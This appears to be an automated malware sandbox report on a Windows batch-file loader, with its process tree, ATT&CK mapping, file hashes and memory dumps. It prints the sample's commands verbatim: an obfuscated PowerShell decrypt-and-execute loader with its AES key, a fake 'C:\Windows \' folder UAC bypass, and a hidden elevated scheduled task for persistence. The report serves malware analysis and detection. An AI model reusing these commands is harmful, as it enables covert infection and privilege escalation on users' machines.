PID 1948 wrote to memory of 2560	1948	powershell.exe	svchost.exe
PID 1948 wrote to memory of 980	1948	powershell.exe	svchost.exe
PID 1948 wrote to memory of 1764	1948	powershell.exe	svchost.exe
PID 1948 wrote to memory of 1164	1948	powershell.exe	svchost.exe
PID 1948 wrote to memory of 976	1948	powershell.exe	svchost.exe
PID 1948 wrote to memory of 1156	1948	powershell.exe	svchost.exe
PID 1948 wrote to memory of 2332	1948	powershell.exe	svchost.exe
PID 1948 wrote to memory of 752	1948	powershell.exe	svchost.exe
PID 1948 wrote to memory of 1904	1948	powershell.exe	svchost.exe
PID 1948 wrote to memory of 2720	1948	powershell.exe	svchost.exe
PID 1948 wrote to memory of 3964	1948	powershell.exe	svchost.exe
PID 1948 wrote to memory of 2712	1948	powershell.exe	svchost.exe
PID 1948 wrote to memory of 1528	1948	powershell.exe	svchost.exe
PID 1948 wrote to memory of 4472	1948	powershell.exe	svchost.exe
PID 1948 wrote to memory of 924	1948	powershell.exe	svchost.exe
PID 1948 wrote to memory of 1504	1948	powershell.exe	svchost.exe
PID 1948 wrote to memory of 2736	1948	powershell.exe	svchost.exe
PID 1948 wrote to memory of 1552	1948	powershell.exe	svchost.exe
PID 1948 wrote to memory of 3468	1948	powershell.exe	svchost.exe
PID 1948 wrote to memory of 1688	1948	powershell.exe	svchost.exe
PID 1948 wrote to memory of 2276	1948	powershell.exe	svchost.exe
PID 1948 wrote to memory of 4148	1948	powershell.exe	svchost.exe
PID 1948 wrote to memory of 1880	1948	powershell.exe	svchost.exe
PID 1948 wrote to memory of 1400	1948	powershell.exe	svchost.exe
PID 1948 wrote to memory of 4044	1948	powershell.exe	svchost.exe
PID 1948 wrote to memory of 1872	1948	powershell.exe	svchost.exe
PID 1948 wrote to memory of 684	1948	powershell.exe	svchost.exe
PID 1948 wrote to memory of 3440	1948	powershell.exe	svchost.exe
PID 1948 wrote to memory of 1268	1948	powershell.exe	svchost.exe
PID 1948 wrote to memory of 4812	1948	powershell.exe	svchost.exe
PID 1948 wrote to memory of 1060	1948	powershell.exe	svchost.exe
PID 1948 wrote to memory of 2832	1948	powershell.exe	svchost.exe
PID 1948 wrote to memory of 1252	1948	powershell.exe	svchost.exe
PID 1948 wrote to memory of 1048	1948	powershell.exe	svchost.exe
PID 1948 wrote to memory of 1240	1948	powershell.exe	svchost.exe
PID 1948 wrote to memory of 2812	1948	powershell.exe	svchost.exe
PID 1948 wrote to memory of 1824	1948	powershell.exe	svchost.exe
PID 1948 wrote to memory of 1416	1948	powershell.exe	svchost.exe
PID 1948 wrote to memory of 4656	1948	powershell.exe	svchost.exe

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
1⤵
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:808

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}
2⤵
PID:936

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
2⤵
PID:3392

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
2⤵
PID:5084

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
1⤵
PID:924

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:980

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:752

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:684

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:976

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:1060

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
1⤵
PID:1164

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1184

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1240

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1252

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1380

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1400

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1416

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1504

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1528

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1552

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1688

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1764

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1784

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1824

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1872

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1880

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1904

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1048

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1156

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
1⤵
PID:2188

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2276

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2332

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2560

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2568

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
- Modifies data under HKEY_USERS
- Modifies registry class
PID:2584

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2712

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2720

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2736

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2768

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2832

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3176

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\RoWare.bat"
2⤵
- Suspicious use of WriteProcessMemory
PID:2244

C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
3⤵
PID:700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jiNE3E2FLDv+NKiKFH8uo69QT6nLdIqdGCpMMEmvmwY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2SAi3wOvnkUFLRYxrM1Aug=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $bjuhq=New-Object System.IO.MemoryStream(,$param_var); $lHqpc=New-Object System.IO.MemoryStream; $ZhWoP=New-Object System.IO.Compression.GZipStream($bjuhq, [IO.Compression.CompressionMode]::Decompress); $ZhWoP.CopyTo($lHqpc); $ZhWoP.Dispose(); $bjuhq.Dispose(); $lHqpc.Dispose(); $lHqpc.ToArray();}function execute_function($param_var,$param2_var){ $DjkcC=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tpQof=$DjkcC.EntryPoint; $tpQof.Invoke($null, $param2_var);}$adpqO = 'C:\Users\Admin\AppData\Local\Temp\RoWare.bat';$host.UI.RawUI.WindowTitle = $adpqO;$cSfZG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($adpqO).Split([Environment]::NewLine);foreach ($zHjor in $cSfZG) { if ($zHjor.StartsWith('dxmcSvpkIMoaFKFAdSEr')) { $kULPw=$zHjor.Substring(20); break; }}$payloads_var=[string[]]$kULPw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
3⤵
PID:1352

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2704

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:4004

C:\Windows \System32\ComputerDefaults.exe
"C:\Windows \System32\ComputerDefaults.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4600

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c call SC.cmd
6⤵
- Suspicious use of WriteProcessMemory
PID:4256

C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
7⤵
PID:1868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jiNE3E2FLDv+NKiKFH8uo69QT6nLdIqdGCpMMEmvmwY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2SAi3wOvnkUFLRYxrM1Aug=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $bjuhq=New-Object System.IO.MemoryStream(,$param_var); $lHqpc=New-Object System.IO.MemoryStream; $ZhWoP=New-Object System.IO.Compression.GZipStream($bjuhq, [IO.Compression.CompressionMode]::Decompress); $ZhWoP.CopyTo($lHqpc); $ZhWoP.Dispose(); $bjuhq.Dispose(); $lHqpc.Dispose(); $lHqpc.ToArray();}function execute_function($param_var,$param2_var){ $DjkcC=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tpQof=$DjkcC.EntryPoint; $tpQof.Invoke($null, $param2_var);}$adpqO = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $adpqO;$cSfZG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($adpqO).Split([Environment]::NewLine);foreach ($zHjor in $cSfZG) { if ($zHjor.StartsWith('dxmcSvpkIMoaFKFAdSEr')) { $kULPw=$zHjor.Substring(20); break; }}$payloads_var=[string[]]$kULPw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
7⤵
PID:1812

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1948

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "
8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\SC')
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3372

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3608

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpC9D.tmp.bat""
8⤵
PID:1584

C:\Windows\system32\timeout.exe
timeout 3
9⤵
- Delays execution with timeout.exe
PID:2228

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q
4⤵
PID:1480

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\RoWare')
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1832

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1868

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3440

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3468

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:4044

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4472

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4812

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:1268

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:2812

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:3964

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4148

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:4656

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
88dc70c361a22feac57b031dd9c1f02f

SHA1
a9b4732260c2a323750022a73480f229ce25d46d

SHA256
43244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59

SHA512
19c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
62KB

MD5
e566632d8956997225be604d026c9b39

SHA1
94a9aade75fffc63ed71404b630eca41d3ce130e

SHA256
b7f66a3543488b08d8533f290eb5f2df7289531934e6db9c346714cfbf609cf0

SHA512
f244eb419eef0617cd585002e52c26120e57fcbadc37762c100712c55ff3c29b0f3991c2ffa8eefc4080d2a8dbfa01b188250ea440d631efed358e702cc3fecd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
1KB

MD5
d812639c743524dab0f770d275d4d3cd

SHA1
a6678646afab7d45b6b2a5f437b84c7976533b96

SHA256
f106b3a1e2c9c4bbb66842b645cd4b638ca4ee8c73d96b46245a720bc9aca72d

SHA512
70ae961f3c2a0e10cb6e8b048c31e2871cc2309056f44cacbf00aab4a7021868210ce316630604008a89409b33f002807119be24428a625dca3a85a31af71aaf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
ffa7e56d3fa94a2069e4cccdc2e9d8ba

SHA1
2bf4f48031adb40c184d212cf708ceb2122b75b8

SHA256
d09125ab09e9f9c09e6c265a1887984a3b1b94cde6a0d868009619292c0df044

SHA512
d3c6885d19d4e079379b172fa499c4e733cd451fbe611988569724d6ab7540fed94cfbb6b712d85a724ce529336bb09be5953b6a9f16713b18cd2053f4a2d71a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
450971c7d1d56547156c1838b2751215

SHA1
523174269f399a8a9889d3c186c8d25c1f338725

SHA256
087c27dba48abf8e4ca4bdf9de77232610d607a851fc3b6b4e027b8377369eb5

SHA512
d8a9cc30f61feeb0b149fa05cdb67cfc7fc939498b1a526b248006b0410e119b79a6ab39a4733da1428a9d88d8da92313f82da8b6cfeafaefe8498c29d3860d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
d8b9a260789a22d72263ef3bb119108c

SHA1
376a9bd48726f422679f2cd65003442c0b6f6dd5

SHA256
d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

SHA512
550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
0a4168419c14b789048626ffc8b36f3e

SHA1
8953652c22a8c7e310277bcf3e98e09ed577017e

SHA256
b6e4354d8edab23a8e069441d729a595da834eb3fbe18c08ba975fe826063f88

SHA512
3ed529e2e9a28d276953d3ba23363d8141887542fdb79e94bd00ba0f0b867300617765783e162a531a3c02f8dc8dbe22328c0fc7bfea088f1ba09c801a52572e

Download Submit
C:\Users\Admin\AppData\Local\Temp\SC.cmd
Filesize
399KB

MD5
472de93de365167459958b7ce29f610e

SHA1
7a7ace619fbd8569c2982fb1fc44aa4b6040f351

SHA256
5baff04fad6153b7debb8003997edf677cd677263af4ab9e95510e225401ccde

SHA512
03fc1017200c386cbe36050f5014c644edd57864ba1f7b88e5ab497d616ba3ec658ee8d690efde5544fe3befe569f3365e4d64f3b276245967193527e3b17f6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mudvpg3z.mdo.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpC9D.tmp.bat
Filesize
170B

MD5
459ef8e66f39dc08d010503793091abc

SHA1
fd2a9070a0268c34d6cf12bef208e8dcc341bb9f

SHA256
591cca1dafe1203d989df57387cb5ce5e73a5318ba0dad9319dbac0e1c0d4c52

SHA512
e3dd9e62dac7c989e1fffe2229be528cfec8419616d15c21edd405a80a6368c512af5a662f288d3c03f8396daf259761ec4ef306cc007409ed603da2d0ad9091

Download Submit
C:\Windows \System32\ComputerDefaults.exe
Filesize
68KB

MD5
640693107ee411d8e862ab115d7b4639

SHA1
497435f5727c5bfe31331ba245e9b7b95dc69d2a

SHA256
a2794be7cb7a4ad2f526fe91ca95a36b2ec1648b288088eaa4809402c7b2c6f4

SHA512
3a554fe1d8d23f06ac86bb078b3e5b4815722adbacbf9492b5b7ad27bf27d44dd948387268dedc2943afc3557ef234e8882475c813cc5f5f4ab566e52bbb03db

Download Submit
C:\Windows \System32\MLANG.dll
Filesize
122KB

MD5
e286ada1af4b08fa4b7c78f862883c4e

SHA1
798ebc7b7cd3db667f1a59ade299be4cff397f39

SHA256
16eb71b68025711fdbc93229fde22ecc73dc8a23be8b40700772b96978187ea3

SHA512
fbbbc893388a39e94d8b2265aef75dbaf5fd928fadabd3dbfc5cbee64b600de0102b82e5d2b5c56efe128b45f6ddd4bba2668194c05decdfa78c8e7e382de3f5

Download Submit
memory/684-126-0x00007FFAA55B0000-0x00007FFAA55C0000-memory.dmp

Filesize
64KB

Download
memory/752-134-0x00007FFAA55B0000-0x00007FFAA55C0000-memory.dmp

Filesize
64KB

Download
memory/976-131-0x00007FFAA55B0000-0x00007FFAA55C0000-memory.dmp

Filesize
64KB

Download
memory/1156-132-0x00007FFAA55B0000-0x00007FFAA55C0000-memory.dmp

Filesize
64KB

Download
memory/1764-125-0x00007FFAA55B0000-0x00007FFAA55C0000-memory.dmp

Filesize
64KB

Download
memory/1824-127-0x00007FFAA55B0000-0x00007FFAA55C0000-memory.dmp

Filesize
64KB

Download
memory/1948-39-0x00007FFAE5520000-0x00007FFAE5729000-memory.dmp

Filesize
2.0MB

Download
memory/1948-248-0x0000027A72120000-0x0000027A7212C000-memory.dmp

Filesize
48KB

Download
memory/1948-84-0x0000027A72060000-0x0000027A72074000-memory.dmp

Filesize
80KB

Download
memory/1948-40-0x00007FFAE3470000-0x00007FFAE352D000-memory.dmp

Filesize
756KB

Download
memory/2332-133-0x00007FFAA55B0000-0x00007FFAA55C0000-memory.dmp

Filesize
64KB

Download
memory/2560-130-0x00007FFAA55B0000-0x00007FFAA55C0000-memory.dmp

Filesize
64KB

Download
memory/2584-128-0x00007FFAA55B0000-0x00007FFAA55C0000-memory.dmp

Filesize
64KB

Download
memory/2704-0-0x00007FFAC46D3000-0x00007FFAC46D5000-memory.dmp

Filesize
8KB

Download
memory/2704-247-0x00007FFAC46D0000-0x00007FFAC5192000-memory.dmp

Filesize
10.8MB

Download
memory/2704-16-0x00007FFAE3470000-0x00007FFAE352D000-memory.dmp

Filesize
756KB

Download
memory/2704-9-0x000001D265EB0000-0x000001D265ED2000-memory.dmp

Filesize
136KB

Download
memory/2704-17-0x000001D2664E0000-0x000001D26652C000-memory.dmp

Filesize
304KB

Download
memory/2704-24-0x00007FFAC46D0000-0x00007FFAC5192000-memory.dmp

Filesize
10.8MB

Download
memory/2704-15-0x00007FFAE5520000-0x00007FFAE5729000-memory.dmp

Filesize
2.0MB

Download
memory/2704-10-0x00007FFAC46D0000-0x00007FFAC5192000-memory.dmp

Filesize
10.8MB

Download
memory/2704-14-0x000001D265EA0000-0x000001D265EB0000-memory.dmp

Filesize
64KB

Download
memory/2704-25-0x00007FFAC46D0000-0x00007FFAC5192000-memory.dmp

Filesize
10.8MB

Download
memory/2704-13-0x000001D266530000-0x000001D266576000-memory.dmp

Filesize
280KB

Download
memory/2704-12-0x00007FFAC46D0000-0x00007FFAC5192000-memory.dmp

Filesize
10.8MB

Download
memory/2704-11-0x00007FFAC46D0000-0x00007FFAC5192000-memory.dmp

Filesize
10.8MB

Download
memory/2712-135-0x00007FFAA55B0000-0x00007FFAA55C0000-memory.dmp

Filesize
64KB

Download
memory/2812-136-0x00007FFAA55B0000-0x00007FFAA55C0000-memory.dmp

Filesize
64KB

Download
memory/3176-76-0x00000000014C0000-0x00000000014EA000-memory.dmp

Filesize
168KB

Download
memory/3176-129-0x00007FFAA55B0000-0x00007FFAA55C0000-memory.dmp

Filesize
64KB

Download